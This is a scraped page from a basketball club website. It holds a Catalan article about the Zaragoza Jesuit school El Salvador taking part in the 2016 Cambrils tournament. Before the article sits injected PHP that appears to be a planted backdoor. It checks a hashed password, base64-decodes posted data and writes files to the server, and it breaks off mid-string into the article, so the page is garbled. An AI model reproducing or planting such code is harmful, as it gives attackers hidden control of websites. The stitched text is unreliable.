function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Salvador, únic equip aragonès del Torneig perquè ha inclòs el bàsquet en el seu programa educatiu - Tgn Bàsquet Club -

El Salvador, únic equip aragonès del Torneig perquè ha inclòs el bàsquet en el seu programa educatiu

By
Updated: març 21, 2016

«L’esport és part de la filosofia educativa del nostre col·legi». El Salvador ha estat l’únic representant dels clubs aragonesos de l’edició de 2016 del Torneig Internacional del TGN Bàsquet a Cambrils. Tradicionalment, la presència dels equips d’aquesta comunitat autònoma són legió al campionat i, amb ells, enguany el rècord de participants hauria estat estratosfèric, superant de molt els 67 de 2015. De fet, tot i l’absència d’aquestes entitats esportives, el Torneig de Cambrils ha aconseguit una xifra de 64 conjunts inscrits, un número que s’hagués elevat fins més enllà dels 80 si haguessin pogut participar, segons els càlculs dels organitzadors.

El motiu de la no presència dels equips de l’Aragó és perquè el calendari escolar no coincideix amb el català. Si això és així, com és que alguns anys poden participar i d’altres no? «Tot va canviar amb l’última legislatura al parlament aragonès. Aleshores es va decidir que si la Setmana Santa era aviat, els dies de festa es farien després i, els anys que aquesta festa religiosa anés més tard, els dies festius es farien abans», explica Fernando Mollat, coordinador de bàsquet d’El Salvador que assegura que aquesta és una bona iniciativa perquè equilibra els trimestres escolars, no els fa massa llargs o massa curts segons quan se celebri Setmana Santa.

El Colegio El Salvador és un centre de titularitat de la Companyia de Jesús, és a dir, els jesuïtes, i que es troba a Saragossa. Té més de 1.800 alumnes i de fa anys l’esport forma part del programa educatiu del centre, per això poden estar a Cambrils a hores d’ara. «Intentem formar als nens globalment i això inclou l’activitat física. L’esport aporta uns valors molt importants. Ara estem en un moment en què els nens creuen que són els grans protagonistes, en aquest sentit, l’esport els posa al seu lloc. Aprenen a guanyar i a perdre, a assumir que hi ha altres nens millor que ells. Això els prepara per a la vida», diu Mollat.

Futbol, bàsquet i les activitats pastorals (religioses), són les activitats extraescolars més sol·licitades per l’alumnat d’El Salvador, que disposa de dos camps de futbol de gespa artificial i un pavelló dedicat exclusivament al bàsquet. «Tenim 33 equips i 4 escoles de bàsquet i això fa que comptem amb uns 415 jugadors de totes les edats».

La màxima mens sana in corpore sano s’aplica a aquesta escola i el pes específic de l’esport queda clar fins i tot en l’organigrama del centre. Així, hi ha un director general i, per sota d’ell, una sèrie de directors acadèmics i un director d’activitats extraescolars. Aquest últim és el cap de Fernando Mollat, que fa 10 anys que és el coordinador de bàsquet d’El Salvador.  «Sí, mentre nosaltres estem aquí, la resta d’alumnes d’Aragó estan a classe», afirma.

Fernando Mollat és exalumne del centre, va començar a jugar a bàsquet als 10 anys i ara és professor de primària en aquesta escola. «Nosaltres no entenem educar a algú sense que faci activitat física, forma part de la formació global, de conjunt, del nen».

IMGP3502m

Enguany, El Salvador competeix amb tres equips a Cambrils (aleví femení i masculí i prefinfantil femení que, però, està dins el quadre d’equips infantils), seguint la norma de participar en els tornejos més destacats com a part de la formació esportiva i educativa dels seus jugadors. «Quan em van oferir el càrrec fa deu anys vaig dir que sí amb la condició de poder participar en tornejos. Crec que és important pels nens. Poden conèixer altres nois i, un fet important, comencen a ser autònoms. Un exemple: molts dels que han vingut aquí no s’han fet la maleta, sinó que l’han fet els seus pares. Ara, però, per tornar, se l’hauran de fer ells, per a molts serà la seva primera vegada. Sembla una ximpleria, però són coses que van sumant». De fet, el col·legi considera que entre els 10 i els 14 anys els jugadors han de participar en tornejos. Més enllà d’aquesta edat només «si s’han guanyat el dret de participar-hi». «Són edats clau en la formació d’esportistes, per això ho hem programat d’aquesta manera». Els tècnics es troben ara en ple debat per decidir si els jugadors i jugadores de categoria benjamina han de participar en aquests tipus de campionats.

Per a Mollat, el Torneig Internacional del TGN Bàsquet a Cambrils és un dels campionats més importants a l’hora de formar els jugadors. El coordinador de bàsquet d’El Salvador destaca la gran quantitat d’equips, el format i l’afluència de públic a les graderies: «Això és el més semblant que hi ha a un campionat d’Espanya, exceptuant, òbviament, la diferència de qualitat en el joc, és clar. Em refereixo que hi ha un format de competició molt semblant, hi ha molts equips de tot arreu i les graderies estan plenes de gom a gom amb un públic molt visceral, que anima moltíssim. Tot això serveix d’aprenentatge pels jugadors, per a competir». Segons Mollat, el paper dels pares és molt important en la presència dels jugadors en els diferents tornejos. «Hi ha dos tipus de pares normalment, aquells que han estat esportistes i, per tant, volen que el seu fill faci esport i participi en campionats i els que no tenen aquesta experiència esportiva. Moltes vegades, la implicació d’aquests últims depèn de la relació amb els altres pares de l’equip. Això pot ser decisiu per deixar anar al nen a un torneig o no», diu.

Aquest col·legi de Saragossa fa 11 anys que no falta a la seva cita amb Cambrils. El fet d’haver inclòs el bàsquet —i altres disciplines— com a part integral de l’educació dels seus alumnes assegura la seva presència any rere any sense haver de preocupar-se si la Setmana Santa cau un dia o un altre.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *